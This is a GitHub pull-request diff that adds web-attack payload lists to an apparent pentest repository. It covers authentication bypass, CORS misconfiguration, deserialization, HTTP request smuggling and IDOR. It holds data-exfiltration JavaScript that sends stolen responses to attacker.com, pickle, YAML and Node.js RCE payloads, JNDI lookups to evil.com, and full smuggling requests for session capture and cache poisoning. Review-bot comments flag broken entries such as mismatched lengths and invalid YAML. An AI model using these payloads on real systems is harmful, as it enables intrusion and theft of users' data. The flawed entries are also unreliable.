Merge pull request #7 from Stalin-143/copilot/add-vulnerabilities-and-payloads

Expand vulnerability payloads and add SSTI, HTTP Request Smuggling, CORS, and JWT attacks
Stalin
2026-01-05 20:30:57 +05:30
committed by GitHub
17 changed files with 3097 additions and 0 deletions
@@ -45,3 +45,226 @@ X-Original-URL: /admin
X-Rewrite-URL: /admin X-Rewrite-URL: /admin
X-Originating-IP: 127.0.0.1 X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1 X-Remote-Addr: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Host: localhost
X-Forwarded-Host: localhost
# URL path manipulation
/admin/..;/
/admin/%2e%2e%3b/
/./admin/./
/admin;/
/admin..
//admin//
/./admin/./panel
/%2e/admin
/admin/~
/admin#
/admin?
# HTTP verb tampering
GET /admin
POST /admin
HEAD /admin
PUT /admin
DELETE /admin
OPTIONS /admin
TRACE /admin
PATCH /admin
# Case manipulation
/Admin
/ADMIN
/AdMiN
/aDmIn
# Unicode bypass
/admin%c0%af
/admin%e0%80%af
/admin%c0%ae%c0%ae/
/%61dmin
# Double encoding
/%252e%252e%252fadmin
/%252e%252e/admin
# Null byte injection
/admin%00
/admin%00.html
/admin%00.jpg
# Credential stuffing patterns
admin:admin
administrator:administrator
root:root
admin:password
admin:123456
admin:admin123
test:test
guest:guest
user:user
demo:demo
# Default credentials bypass
username=admin&password=
username=&password=
username=admin&password=%20
username=admin&password=*
# Password reset bypass
email=victim@example.com&email=attacker@example.com
token=&email=attacker@example.com
token=0
token=null
token=false
# OTP/2FA bypass
otp=000000
otp=123456
otp=111111
otp=
otp=%20
otp=null
# Response manipulation
# Change HTTP response from 401/403 to 200
# Change "authenticated": false to "authenticated": true
# Change "role": "user" to "role": "admin"
# JWT manipulation (see JWT-Vulnerabilities for more)
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
Authorization: Bearer null
Authorization: Bearer
Authorization:
# GraphQL authentication bypass
{"query":"mutation{login(username:\"admin\",password:\"' OR '1'='1\"){token}}"}
{"query":"{users{id username password}}"}
# XML authentication bypass
<user><username>admin</username><password>' OR '1'='1</password></user>
# LDAP authentication bypass
username=*
username=admin)(|(password=*
username=*)(uid=*))(|(uid=*
# OAuth/OIDC bypass
redirect_uri=https://attacker.com
state=
nonce=
code=
# API key bypass
api_key=
X-API-Key:
Authorization:
apikey=null
# Session fixation
PHPSESSID=attacker_controlled_session
jsessionid=12345
# CAPTCHA bypass
captcha=
g-recaptcha-response=
h-captcha-response=
captcha_response=03AAYGu2...
recaptcha=
# Rate limiting bypass
X-Forwarded-For: random_ip_each_request
X-Originating-IP: random_ip_each_request
X-Remote-IP: random_ip_each_request
# Account enumeration
username=admin&password=wrong
username=nonexistent&password=wrong
# Login form variations
user[admin]=1
user[role]=admin
username[]=admin
password[]=anything
# Time-based bypass
wait_for_rate_limit=true
timestamp=future_date
valid_until=9999999999
# Magic hashes (PHP type juggling)
# 0e215962017 == 0 (PHP)
# 0e291242476940776845150308577824 == 0
password=0e215962017
password=240610708
# Unicode normalization
username=ⓐⓓⓜⓘⓝ
username=𝒶𝒹𝓂𝒾𝓃
username=admin
# Homograph attack
username=αdmin (Greek alpha)
username=аdmin (Cyrillic а)
# Whitespace bypass
username= admin
username=admin
username=%20admin
username=admin%20
# Special characters
username=admin'
username=admin"
username=admin`
username=admin\
# Email bypass for authentication
email=admin@localhost
email=admin@127.0.0.1
email=@example.com
email=victim@attacker.com
# Host header authentication bypass
Host: localhost
Host: 127.0.0.1
Host: internal.company.com
# Referer bypass
Referer: https://trusted-site.com
Referer: https://localhost
# Origin bypass
Origin: https://trusted-site.com
Origin: null
# Authentication via GET instead of POST
GET /api/login?username=admin&password=admin123
# File inclusion for authentication bypass
/etc/passwd
../../../../../../etc/passwd
# SSRF to bypass authentication
url=http://localhost/admin
url=http://127.0.0.1/admin
url=http://169.254.169.254/latest/meta-data/
# Request smuggling for authentication bypass
Content-Length: 0
Transfer-Encoding: chunked
# Race conditions
# Send multiple authentication requests simultaneously
# Business logic bypass
step=1&step=3
status=pending&status=approved
verified=false&verified=true
# Broken authentication chain
# Skip step 2 in multi-step authentication
# Reuse old session tokens
# Replay old authentication requests
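Review bot: several entries in this hunk are placeholders or annotations rather than literal payloads (`X-Forwarded-For: random_ip_each_request`, `PHPSESSID=attacker_controlled_session`, `timestamp=future_date`, `username=αdmin (Greek alpha)`), and the `# Response manipulation`, `# Race conditions` and `# Broken authentication chain` sections are comment-only, so any tool that feeds this file line by line will send the placeholder text verbatim. Suggest one marked placeholder convention such as `<RANDOM_IP>` and moving the prose-only sections into the companion markdown. The `# Magic hashes` comment `0e215962017 == 0 (PHP)` should also say that this only matters where the application compares hashes with PHP's loose `==`, since that is the precondition a reviewer auditing code for this issue needs to check.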
@@ -0,0 +1,35 @@
# CORS Misconfiguration
## Description
Cross-Origin Resource Sharing (CORS) misconfiguration occurs when a web application incorrectly configures the CORS headers, allowing unauthorized domains to access sensitive resources. This can lead to data theft, account compromise, and bypassing of the Same-Origin Policy.
## Common Misconfigurations
- **Wildcard Origin with Credentials** - `Access-Control-Allow-Origin: *` with `Access-Control-Allow-Credentials: true`
- **Null Origin Allowed** - Accepting `Origin: null`
- **Reflected Origin** - Reflecting any origin without validation
- **Subdomain Trust** - Trusting all subdomains including attacker-controlled ones
- **Pre-domain/Post-domain Trust** - Weak regex matching for origins
## Impact
- Steal sensitive user data
- Perform actions on behalf of users
- Access private API endpoints
- Read authentication tokens
- Bypass CSRF protections
## Common Attack Vectors
- API endpoints with sensitive data
- Authentication endpoints
- Profile information endpoints
- Admin panels
- Internal APIs exposed via CORS
## Testing Approach
1. Send requests with various `Origin` headers
2. Check if `Access-Control-Allow-Origin` reflects the attacker's origin
3. Verify if `Access-Control-Allow-Credentials: true` is set
4. Test with null origin, subdomains, and similar domains
5. Check for weak regex patterns in origin validation
## Payloads
See `cors-misconfiguration-payloads.txt` for a comprehensive list of CORS misconfiguration test payloads.
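Review bot: the `**Wildcard Origin with Credentials**` item is not exploitable as stated: browsers refuse to expose a credentialed response when `Access-Control-Allow-Origin` is the literal `*`, so the dangerous pattern is a reflected (or `null`) origin combined with `Access-Control-Allow-Credentials: true`, and the description should say so. The file also has Description, Impact and Testing Approach sections but no Remediation section; suggest adding one that states the rule the rest of the file implies: a server-side allow-list of exact origins, never echoing the request `Origin`, never allowing `null`, and no credentials unless the origin is on that list.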
@@ -0,0 +1,276 @@
# CORS Misconfiguration Payloads
# Basic Origin testing
Origin: https://evil.com
Origin: http://evil.com
Origin: https://attacker.com
Origin: http://attacker.com
# Null Origin (works in sandboxed iframes)
Origin: null
# Subdomain variations
Origin: https://evil.target.com
Origin: https://target.com.evil.com
Origin: https://subtarget.com
Origin: https://admin.target.com
Origin: https://api.target.com
# Pre-domain bypass
Origin: https://target.com.evil.com
Origin: https://wwwtarget.com
Origin: https://not-target.com
Origin: https://target.com-evil.com
Origin: https://target.com.attacker.com
# Post-domain bypass
Origin: https://evil.target.com
Origin: https://evil-target.com
Origin: https://eviltarget.com
# Protocol variations
Origin: http://target.com
Origin: https://target.com
Origin: ftp://target.com
Origin: file://target.com
# Port variations
Origin: https://target.com:8080
Origin: https://target.com:8443
Origin: https://target.com:443
Origin: https://target.com:80
# Case sensitivity bypass
Origin: https://TARGET.COM
Origin: https://Target.Com
Origin: https://TaRgEt.CoM
# Underscore in subdomain
Origin: https://evil_admin.target.com
Origin: https://admin_.target.com
# Special characters
Origin: https://target.com%0d%0aEvil: header
Origin: https://target.com%00.evil.com
Origin: https://target.com@evil.com
Origin: https://evil@target.com
# Regex bypass patterns
Origin: https://target.com.evil.com
Origin: https://evil.target.com.net
Origin: https://atarget.com
Origin: https://target.com.de
Origin: https://target.co.uk
Origin: https://target.org
# Localhost variations
Origin: http://localhost
Origin: http://127.0.0.1
Origin: http://0.0.0.0
Origin: http://[::1]
Origin: http://localhost.target.com
# File protocol
Origin: file://
Origin: file:///etc/passwd
# Wildcard subdomain bypass
Origin: https://anything.target.com
Origin: https://xyz123.target.com
Origin: https://hacker.target.com
# Pre-flight request headers
Access-Control-Request-Method: POST
Access-Control-Request-Method: PUT
Access-Control-Request-Method: DELETE
Access-Control-Request-Method: PATCH
Access-Control-Request-Headers: X-Custom-Header
Access-Control-Request-Headers: Authorization
Access-Control-Request-Headers: Content-Type
# Data exfiltration payload (JavaScript)
# For use when CORS is misconfigured
var req = new XMLHttpRequest();
req.open('GET', 'https://target.com/api/user/data', true);
req.withCredentials = true;
req.onload = function() {
fetch('https://attacker.com/steal?data=' + btoa(req.responseText));
};
req.send();
# Fetch API exploitation
fetch('https://target.com/api/sensitive', {
credentials: 'include'
}).then(r => r.text()).then(data => {
fetch('https://attacker.com/log?data=' + btoa(data));
});
# Testing for credential exposure
GET /api/user HTTP/1.1
Host: target.com
Origin: https://evil.com
Cookie: session=abc123
# WebSocket CORS bypass
var ws = new WebSocket('wss://target.com/socket');
ws.onmessage = function(event) {
fetch('https://attacker.com/log?data=' + btoa(event.data));
};
# Multiple Origin headers
Origin: https://target.com
Origin: https://evil.com
# Origin with credentials
Origin: https://user:pass@target.com
Origin: https://admin@target.com
# Homograph attacks (IDN)
Origin: https://tаrget.com # Cyrillic 'а'
Origin: https://tаrgеt.com # Cyrillic 'а' and 'е'
Origin: https://targеt.com # Cyrillic 'е'
# Bypass via special TLDs
Origin: https://target.com.local
Origin: https://target.com.internal
Origin: https://target.com.corp
# IPv6 localhost variations
Origin: http://[::1]
Origin: http://[0:0:0:0:0:0:0:1]
Origin: http://[0:0:0:0:0:0:0:0]
Origin: http://[::ffff:127.0.0.1]
# Private IP ranges
Origin: http://192.168.1.1
Origin: http://10.0.0.1
Origin: http://172.16.0.1
Origin: http://169.254.169.254
# CORS with reflected subdomains
Origin: https://xss.target.com
Origin: https://<script>.target.com
Origin: https://javascript:alert(1).target.com
# Bypass with URL encoding
Origin: https://%74%61%72%67%65%74.com
Origin: https://target%2ecom
# Double encoding
Origin: https://%2574%2561%2572%2567%2565%2574.com
# Unicode bypass
Origin: https://ⓣⓐⓡⓖⓔⓣ.com
Origin: https://𝓽𝓪𝓻𝓰𝓮𝓽.com
# Testing Access-Control-Allow-Methods
GET /api/admin HTTP/1.1
Host: target.com
Origin: https://evil.com
Access-Control-Request-Method: DELETE
# Testing Access-Control-Allow-Headers
GET /api/user HTTP/1.1
Host: target.com
Origin: https://evil.com
Access-Control-Request-Headers: X-Admin-Token
# Cache poisoning via CORS
GET /api/data HTTP/1.1
Host: target.com
Origin: https://evil.com
X-Forwarded-Host: evil.com
# CORS with authentication bypass
GET /api/sensitive HTTP/1.1
Host: target.com
Origin: https://evil.com
Cookie: session=victim_session_token
# Testing weak regex patterns
Origin: https://target.com.example.com
Origin: https://example.target.com.example.com
Origin: https://target_com.example.com
Origin: https://target-com.example.com
# Path traversal in Origin
Origin: https://target.com/../../evil.com
Origin: https://target.com/../evil.com
# Fragment identifier bypass
Origin: https://target.com#evil.com
Origin: https://target.com#@evil.com
# Query string in Origin (invalid but test anyway)
Origin: https://target.com?evil.com
Origin: https://target.com?redirect=evil.com
# Bypassing with trailing characters
Origin: https://target.com/
Origin: https://target.com\
Origin: https://target.com;
Origin: https://target.com,
# Mixed content bypass
Origin: http://target.com (when site uses HTTPS)
Origin: https://target.com (when site uses HTTP)
# Testing with data URI
Origin: data:text/html,<script>alert(1)</script>
# Testing with javascript URI
Origin: javascript:alert(1)
# Origin with username
Origin: https://admin:password@target.com
# Testing with blob URI
Origin: blob:https://target.com/uuid
# Custom protocol
Origin: custom://target.com
Origin: app://target.com
# Testing max-age for preflight
Access-Control-Max-Age: 86400
# Wildcard with specific paths
Origin: https://evil.com/api/public
# Testing exposed headers
Access-Control-Expose-Headers: Authorization, X-API-Key
# CORS on error pages
GET /404 HTTP/1.1
Host: target.com
Origin: https://evil.com
# CORS on redirect
GET /redirect HTTP/1.1
Host: target.com
Origin: https://evil.com
# Exploiting wildcard subdomains
Origin: https://attacker-controlled.target.com
Origin: https://s3bucket.target.com
Origin: https://malicious.pages.target.com
# Testing JSONP with CORS
GET /api/data?callback=alert HTTP/1.1
Host: target.com
Origin: https://evil.com
# WebRTC CORS bypass
var pc = new RTCPeerConnection();
pc.createDataChannel('');
pc.createOffer().then(offer => pc.setLocalDescription(offer));
# Service Worker CORS
self.addEventListener('fetch', event => {
event.respondWith(
fetch(event.request.url, {
mode: 'cors',
credentials: 'include'
})
);
});
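Review bot: the `# Homograph attacks (IDN)` and `# Mixed content bypass` entries append commentary to the header value (`Origin: https://tаrget.com # Cyrillic 'а'`, `Origin: http://target.com (when site uses HTTPS)`), so sent as-is they are malformed, and a number of lines are exact duplicates across sections (`Origin: https://target.com.evil.com` appears under `# Subdomain variations`, `# Pre-domain bypass` and `# Regex bypass patterns`; `Origin: http://[::1]` under both localhost sections). Suggest moving the commentary to the preceding `#` line and de-duplicating. The `# WebSocket CORS bypass` label is also inaccurate: the WebSocket handshake is not governed by CORS, and what the snippet relies on is the server not checking the `Origin` header at all (cross-site WebSocket hijacking), which is the property a defender should test and fix separately from the CORS headers.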
@@ -53,3 +53,163 @@ Spring2
# Ruby Marshal # Ruby Marshal
\x04\x08o:\x10User\x06:\x0arole:\x0aadmin \x04\x08o:\x10User\x06:\x0arole:\x0aadmin
# Advanced Java gadget chains
# Apache Commons Collections
org.apache.commons.collections.Transformer
org.apache.commons.collections.functors.InvokerTransformer
org.apache.commons.collections.functors.ChainedTransformer
org.apache.commons.collections.functors.ConstantTransformer
org.apache.commons.collections.keyvalue.TiedMapEntry
org.apache.commons.collections.map.LazyMap
# Spring Framework
org.springframework.context.support.ClassPathXmlApplicationContext
org.springframework.beans.factory.config.PropertyPathFactoryBean
# C3P0
com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase
com.mchange.v2.c3p0.JndiRefForwardingDataSource
# Hibernate
org.hibernate.engine.spi.TypedValue
org.hibernate.tuple.component.AbstractComponentTuplizer
# Vaadin
com.vaadin.data.util.NestedMethodProperty
com.vaadin.data.util.PropertysetItem
# Advanced PHP serialization
O:8:"stdClass":1:{s:4:"code";s:10:"phpinfo();";}
O:11:"PDOStatement":0:{}
a:2:{i:0;O:8:"stdClass":0:{}i:1;s:5:"admin";}
O:12:"SplFileObject":1:{s:0:"";s:11:"/etc/passwd";}
# PHP object injection with magic methods
O:10:"Evil_Class":1:{s:8:"filename";s:11:"/etc/passwd";}
O:4:"User":2:{s:2:"id";i:1;s:4:"role";s:5:"admin";}
O:7:"PhpCode":1:{s:4:"code";s:6:"system";}
# Advanced Python pickle
\x80\x03csubprocess\ncheck_output\n(S'ls'\ntR.
\x80\x03csubprocess\nPopen\n(S'calc'\ntR.
\x80\x03cos\nsystem\n(S'whoami'\ntR.
cos\nsystem\n(S'cat /etc/passwd'\ntR.
# Python pickle RCE variants
c__builtin__\neval\n(S'__import__("os").system("ls")'\ntR.
\x80\x03c__builtin__\nexec\n(S'import os;os.system("whoami")'\ntR.
# .NET BinaryFormatter
AAEAAAD/////AQAAAAAAAAAMAgAAAE1TeXN0ZW0u
AAEAAAD/////AQAAAAAAAAAEAQAAAClT
# .NET ObjectStateFormatter
/wEy
# .NET SoapFormatter
<SOAP-ENV:Envelope
# ViewState exploitation (.NET)
__VIEWSTATE=/wEPDwUKLTY5NDY
__VIEWSTATEGENERATOR=CA0B0334
# JSON deserialization with type confusion
{"$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework"}
{"__type":"System.IO.FileInfo"}
{"@class":"java.net.URL","val":"http://evil.com"}
# Jackson polymorphic deserialization
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:"}]
["org.apache.xbean.propertyeditor.JndiConverter",{"asText":"ldap://evil.com/"}]
["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"ldap://evil.com/","autoCommit":true}]
# Fastjson exploitation
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://evil.com/Exploit","autoCommit":true}
{"@type":"java.net.Inet4Address","val":"evil.com"}
{"@type":"java.net.URL","val":"http://evil.com"}
# YAML deserialization (Python)
!!python/object/apply:subprocess.Popen [['calc']]
!!python/object/new:os.system [calc]
!!python/object/apply:os.system ['whoami']
# YAML deserialization (Ruby)
--- !ruby/object:Gem::Installer
i: x
--- !ruby/object:Gem::Requirement
requirements: !ruby/object:Gem::Package::TarReader
# Node.js prototype pollution
{"__proto__":{"isAdmin":true}}
{"constructor":{"prototype":{"isAdmin":true}}}
{"__proto__":{"shell":"/bin/sh"}}
# Node.js VM escape
{"rce":"_$$ND_FUNC$$_function(){return require('child_process').execSync('whoami').toString()}()"}
{"eval":"_$$ND_FUNC$$_function(){return global.process.mainModule.require('child_process').execSync('id').toString()}()"}
# Ruby YAML deserialization
--- !ruby/object:Gem::Installer\ni: x\n--- !ruby/object:Gem::SpecFetcher\ni: y
!ruby/object:Gem::Requirement {requirements: [[!, !ruby/object:Gem::Package::TarReader {}}]}
# Java RMI exploitation
rmi://evil.com:1099/Object
rmi://127.0.0.1:1099/Exploit
# JNDI injection patterns
ldap://evil.com/Exploit
ldaps://evil.com/Exploit
rmi://evil.com/Exploit
dns://evil.com/Exploit
iiop://evil.com/Exploit
corba://evil.com/Exploit
# Java gadget chain references
ysoserial.payloads.CommonsCollections1
ysoserial.payloads.CommonsCollections2
ysoserial.payloads.CommonsCollections3
ysoserial.payloads.CommonsCollections4
ysoserial.payloads.CommonsCollections5
ysoserial.payloads.CommonsCollections6
ysoserial.payloads.CommonsCollections7
ysoserial.payloads.Groovy1
ysoserial.payloads.Spring1
ysoserial.payloads.Spring2
ysoserial.payloads.ROME
ysoserial.payloads.JDK7u21
ysoserial.payloads.Jython1
ysoserial.payloads.Click1
ysoserial.payloads.Wicket1
# Base64 encoded Java serialized objects
rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZQ==
rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAU=
rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldABA
# PHP Phar deserialization
phar://exploit.phar/test.txt
phar://./exploit.phar
phar://exploit.jpg/test.txt
# AMF (Action Message Format)
\x00\x03\x00\x00\x00\x01
# MessagePack
\x81\xa4eval\xa6system
# Pickle bytecode patterns
c__builtin__\ngetattr\n
c__builtin__\n__import__\n
cos\nsystem\n
csubprocess\ncall\n
csubprocess\ncheck_output\n
# Serialization headers detection
\xac\xed\x00\x05 # Java serialization
O: # PHP serialization
\x80\x03 # Python pickle protocol 3
\x80\x04 # Python pickle protocol 4
\x04\x08 # Ruby Marshal
AAEAAAD # .NET BinaryFormatter
/wE # .NET ObjectStateFormatter
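Review bot: the `# Ruby YAML deserialization` block near the end repeats the earlier `# YAML deserialization (Ruby)` section with literal `\n` escapes, and its second line (`!ruby/object:Gem::Requirement {requirements: [[!, ... {}}]}`) has unbalanced brackets and is not valid YAML; suggest dropping the duplicate. The `# Base64 encoded Java serialized objects` entries are stream-header prefixes, not objects: `rO0ABXNy...` decodes to `\xac\xed\x00\x05sr` followed by a class name, which is signature material that belongs with the `# Serialization headers detection` section at the bottom rather than under a payload heading.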
@@ -0,0 +1,41 @@
# HTTP Request Smuggling
## Description
HTTP Request Smuggling occurs when the front-end and back-end servers disagree about where one request ends and the next begins. This vulnerability allows attackers to bypass security controls, gain unauthorized access, and poison web caches.
## Vulnerability Types
- **CL.TE** - Content-Length vs Transfer-Encoding
- **TE.CL** - Transfer-Encoding vs Content-Length
- **TE.TE** - Transfer-Encoding obfuscation
- **CL.CL** - Duplicate Content-Length headers
## Common Attack Vectors
- Front-end/Back-end server desynchronization
- Load balancer misconfigurations
- Reverse proxy issues
- CDN edge servers
- WAF bypass
## Impact
- Bypass security controls
- Web cache poisoning
- Cross-site scripting
- Request hijacking
- Credential theft
- Access other users' requests
## Testing Approach
1. Send requests with conflicting Content-Length and Transfer-Encoding headers
2. Observe timing differences and response variations
3. Test with different header obfuscation techniques
4. Verify if smuggled requests affect subsequent requests
## Common Vulnerable Configurations
- HAProxy + Apache
- Nginx + Apache
- AWS ALB + various backends
- Akamai + various backends
- Cloudflare + various backends
## Payloads
See `http-request-smuggling-payloads.txt` for a comprehensive list of HTTP Request Smuggling payloads.
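Review bot: the `## Common Vulnerable Configurations` list names vendor pairings (`HAProxy + Apache`, `AWS ALB`, `Akamai`, `Cloudflare`) with no versions or advisory references, so it reads as if those products are permanently vulnerable; suggest either citing the specific issues and affected versions or replacing the list with the general condition already given in the Description (front end and back end parsing `Content-Length` and `Transfer-Encoding` differently). A Remediation section is also missing; the measures that follow directly from the file's own vulnerability types are rejecting requests that carry both headers or a malformed `Transfer-Encoding`, normalising ambiguous requests at the front end so the back end never sees them, and using the same parser or HTTP/2 end to end.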
@@ -0,0 +1,526 @@
# HTTP Request Smuggling Payloads
# CL.TE (Content-Length vs Transfer-Encoding)
# Front-end uses Content-Length, back-end uses Transfer-Encoding
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked
0
SMUGGLED
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 6
Transfer-Encoding: chunked
0
G
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
---
# TE.CL (Transfer-Encoding vs Content-Length)
# Front-end uses Transfer-Encoding, back-end uses Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked
8
SMUGGLED
0
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
5e
POST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
0
---
# TE.TE (Transfer-Encoding obfuscation)
# Both servers handle Transfer-Encoding but one can be obfuscated
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
Transfer-Encoding: x
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
---
# Transfer-Encoding obfuscation variants
Transfer-Encoding: chunked
Transfer-Encoding: xchunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding: chunked
Transfer-encoding: chunked
Transfer-Encoding: chunked
Transfer-Encoding: chunked;
Transfer-Encoding: chunked,
Transfer-Encoding: identity
Transfer-Encoding: identity, chunked
Transfer-Encoding: chunked, identity
Transfer-Encoding: chunked
Transfer-Encoding: identity
Transfer-Encoding: chunked
Transfer-Encoding : chunked
Transfer-Encoding:chunked
Transfer-Encoding:
chunked
Transfer-Encoding:
chunked
[space]Transfer-Encoding: chunked
Transfer-Encoding[space]: chunked
Transfer-Encoding:[space]chunked
Transfer-Encoding: chu nked
Transfer-Encoding: chunk ed
Transfer-Encoding: chun\x0bked
# CL.CL (Duplicate Content-Length)
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 8
Content-Length: 7
12345
SMUGGLED
---
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 8
Content-Length: 9
test=1
SMUGGLED
---
# Cache poisoning via request smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 130
Transfer-Encoding: chunked
0
GET /static/script.js HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
---
# Bypassing front-end security controls
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Length: 100
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For: 127.0.0.1
Content-Length: 10
x=
---
# Capturing other users' requests
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 230
Transfer-Encoding: chunked
0
POST /log HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 1000
comment=
---
# XSS via request smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked
0
GET /search?q=<script>alert(1)</script> HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
---
# Web cache deception
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 180
Transfer-Encoding: chunked
0
GET /static/include.js HTTP/1.1
Host: vulnerable-website.com
X-Ignore: X
GET /account HTTP/1.1
Host: vulnerable-website.com
---
# Exploiting different chunk handling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
96
POST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
csrf=token&action=delete
0
---
# Timing-based detection payload
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 4
Transfer-Encoding: chunked
1
Z
Q
---
# Header injection for smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 200
Transfer-Encoding: chunked
0
GET / HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-Host: evil.com
Content-Length: 10
x=
---
# Session hijacking
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 250
Transfer-Encoding: chunked
0
POST /account/update HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
email=attacker@evil.com&session=
---
# Smuggling with newlines
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding:
chunked
Content-Length: 4
5c
SMUGGLED
0
---
# Smuggling with tabs
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4
5c
SMUGGLED
0
---
# HTTP/2 downgrade smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
Content-Length: 4
0
SMUGGLED
---
# Chunk size obfuscation
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
0000000000000000000a
SMUGGLED123
0
---
# Negative Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: -1
Transfer-Encoding: chunked
0
SMUGGLED
---
# Very large Content-Length
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 999999999
Transfer-Encoding: chunked
0
SMUGGLED
---
# Mixed line endings
POST / HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
Content-Length: 4\r\n
Transfer-Encoding: chunked\n
\r\n
5c\r\n
SMUGGLED\r\n
0\r\n
\r\n
---
# Unicode in headers
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
TransferEncoding: identity
0
SMUGGLED
---
# Multiple Host headers
POST / HTTP/1.1
Host: vulnerable-website.com
Host: evil.com
Content-Length: 4
Transfer-Encoding: chunked
0
SMUGGLED
---
# Smuggling to internal endpoints
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked
0
GET /internal/admin HTTP/1.1
Host: localhost
X-Forwarded-For: 127.0.0.1
Content-Length: 10
x=
---
# Cookie injection via smuggling
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 180
Transfer-Encoding: chunked
0
GET / HTTP/1.1
Host: vulnerable-website.com
Cookie: session=stolen_session_here
Content-Length: 10
x=
---
# Authorization bypass
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 200
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: vulnerable-website.com
Authorization: Bearer admin_token_here
Content-Length: 10
x=
---
# CRLF injection in chunks
POST / HTTP/1.1
Host: vulnerable-website.com
Transfer-Encoding: chunked
0\r\n
\r\n
GET /admin HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
\r\n
---
# Smuggling via Content-Type
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
0
SMUGGLED
---
# Request line injection
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 150
Transfer-Encoding: chunked
0
GPOST /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10
x=
---
# Protocol smuggling (HTTP/1.1 -> HTTP/2)
POST / HTTP/1.1
Host: vulnerable-website.com
Upgrade: h2c
Connection: Upgrade, HTTP2-Settings
HTTP2-Settings: AAMAAABkAAQAAP__
Content-Length: 4
Transfer-Encoding: chunked
0
SMUGGLED
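Review bot: the third request under `# CL.TE` (`Content-Length: 4` with chunk `5c` and `GPOST / HTTP/1.1`) is a TE.CL payload, since only a front end honouring `Transfer-Encoding` would forward the 92-byte chunk; it should move under `# TE.CL`. Many later entries also carry lengths that do not match the bodies shown: `5c` (92 bytes) followed by the 8-byte `SMUGGLED` line under `# Smuggling with newlines`, and `Content-Length: 130`, `100`, `230`, `150`, `180`, `200`, `250` on the cache-poisoning, bypass, capture, header-injection and session entries whose bodies are far shorter, so a front end using `Content-Length` would wait for bytes that never arrive. Suggest recomputing each value against the CRLF-terminated body or stating at the top of the file that these are templates whose lengths the sender must fix. `# Smuggling with tabs` and `# Unicode in headers` contain no tab or non-ASCII character as committed, so they are identical to plain entries; the obfuscation characters need to be present, or escaped the way the `\r\n` entries are, for those cases to mean anything.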
@@ -38,3 +38,180 @@
# Array/Multiple IDs # Array/Multiple IDs
?id[]=1&id[]=2 ?id[]=1&id[]=2
?ids=1,2,3 ?ids=1,2,3
# HTTP Methods for IDOR
GET /api/user/1
POST /api/user/1
PUT /api/user/1
DELETE /api/user/1
PATCH /api/user/1
# Path-based IDOR
/users/1/profile
/users/2/profile
/users/admin/profile
/api/v1/users/1
/api/v1/users/2
